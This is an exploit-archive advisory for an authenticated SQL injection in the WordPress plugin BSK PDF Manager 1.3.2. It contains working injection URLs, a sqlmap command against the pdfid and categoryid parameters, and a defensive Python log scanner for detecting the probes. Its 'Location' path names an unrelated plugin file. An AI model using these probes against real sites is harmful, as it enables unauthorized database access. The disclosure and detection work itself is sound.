WordPress BSK PDF Manager 1.3.2 SQL Injection

2014.07.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

######################

# Exploit Title : Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/

# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip

# Date : 2014-07-04

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0

######################

# Location :

http://localhost/wp-content/plugins/compfight/compfight-search.php

######################

# Vulnerable code :

[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:    if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:        $categories_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:    if(isset($_GET['categoryid']) && $_GET['categoryid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:        $category_id = trim($_GET['categoryid']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:    if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:        $lists_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:    if(isset($_GET['pdfid']) && $_GET['pdfid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:        $pdf_id = trim($_GET['pdfid']);

$category_id = trim($_GET['categoryid']);
$pdf_id = trim($_GET['pdfid']);

######################

Exploit Code via Browser:

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2
http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2

Exploit Code via sqlmap:

sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid

#####################

Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it

#####################
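The root cause shown above is that `pdfid` and `categoryid` are only passed through `trim()` before use, so anything other than a positive integer reaches the query. A defender reviewing web-server logs for this plugin can apply exactly the check the code was missing: on the plugin's admin pages, those two parameters must be a plain positive integer (which is also what the plugin's own `if($_GET['pdfid'])` precondition implies, since "0" is falsy in PHP). The following is an added example written for this page, not code from the advisory or the plugin; the combined-log-format sample lines, the host names and the user names in it are constructed, and the `suspicious_ids` / `scan` helpers are hypothetical names.

```python
"""Flag requests to the BSK PDF Manager admin pages whose id parameters are
not plain positive integers. Added example with constructed sample log lines;
not the plugin's code and not taken from the advisory."""
import re
from urllib.parse import parse_qs, urlsplit

# The plugin's admin pages and the two id parameters the advisory names.
WATCHED_PAGES = {"bsk-pdf-manager", "bsk-pdf-manager-pdfs"}
ID_PARAMS = ("pdfid", "categoryid")

# A legitimate id is a positive integer and nothing else; this is the check
# the plugin should have applied (e.g. via absint()) before building a query.
VALID_ID = re.compile(r"^[1-9][0-9]*$")

# Combined log format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (hypothetical hosts and users, not real traffic).
# Line 2 and 3 carry the boolean probe from the advisory, URL-encoded the two
# ways a browser or tool would send it; line 4 is a request to another page.
SAMPLE_LOG = [
    '10.0.0.5 - admin [10/Jul/2014:10:15:01 +0200] "GET /wp-admin/admin.php'
    '?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 HTTP/1.1" 200 5120',
    '10.0.0.5 - admin [10/Jul/2014:10:15:07 +0200] "GET /wp-admin/admin.php'
    '?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1%20and%201%3D2 HTTP/1.1" 200 4870',
    '10.0.0.9 - editor [10/Jul/2014:10:16:30 +0200] "GET /wp-admin/admin.php'
    '?page=bsk-pdf-manager&view=edit&categoryid=1+and+1%3D2 HTTP/1.1" 200 4870',
    '10.0.0.9 - editor [10/Jul/2014:10:18:00 +0200] "GET /wp-admin/admin.php'
    '?page=other-plugin&id=1%20and%201%3D2 HTTP/1.1" 200 900',
]


def suspicious_ids(log_line):
    """Return [(param, decoded_value)] for id parameters that are not plain
    positive integers, or [] if the line is not a watched plugin request."""
    m = LOG_RE.match(log_line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/wp-admin/admin.php"):
        return []
    # parse_qs decodes %XX sequences and '+' so the raw payload is visible.
    query = parse_qs(parts.query, keep_blank_values=True)
    page = query.get("page", [""])[0]
    if page not in WATCHED_PAGES:
        return []
    hits = []
    for param in ID_PARAMS:
        for value in query.get(param, []):
            if not VALID_ID.match(value):
                hits.append((param, value))
    return hits


def scan(lines):
    """Return [(host, user, param, value)] for every suspicious request,
    so the authenticated account behind each probe is visible at a glance."""
    findings = []
    for line in lines:
        hits = suspicious_ids(line)
        if hits:
            m = LOG_RE.match(line)
            for param, value in hits:
                findings.append((m.group("host"), m.group("user"), param, value))
    return findings


if __name__ == "__main__":
    for host, user, param, value in scan(SAMPLE_LOG):
        print(f"{host} user={user} {param}={value!r}")
```

Because the injection is authenticated, the `user` column matters more than the source address: a hit points at a WordPress account whose session cookie is being used to probe the plugin, which is the account to review (or revoke) while the plugin is updated or disabled.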


Copyright 2024, cxsecurity.com
